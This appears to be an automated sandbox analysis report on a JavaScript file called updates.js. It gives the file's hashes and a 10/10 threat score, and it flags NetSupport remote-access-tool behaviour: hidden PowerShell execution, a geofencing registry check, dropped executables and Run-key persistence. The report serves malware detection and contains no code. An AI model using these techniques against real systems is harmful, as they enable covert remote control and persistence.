Extracted

• • Target

    updates.js

  • Size

    7.3MB

  • MD5

    08001e8052c73b35e5fa47df27bcdd45

  • SHA1

    9d896ca6e114e945b2ef5b22eb92d08247722468

  • SHA256

    c5bc6a2aadb6733ce4850145f9a1fcf5b2cdd0eb1a69f48af9e8867592fcbdd3

  • SHA512

    1262b48a72375b52aed6cd9c0631178d489778c29a063f2c716630e2996473faad6185fcd968fbcc38a069bd1a7b5f1ee86c7ad54d53607b9337368a8447efad

  • SSDEEP

    49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQX:c

  Score

  10^/10

  executionnetsupportpersistencerat

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport

  • Blocklisted process makes network request

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Checks computer location settings

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE

  • Loads dropped DLL

  • Adds Run key to start application

    persistence
  behavioral1behavioral2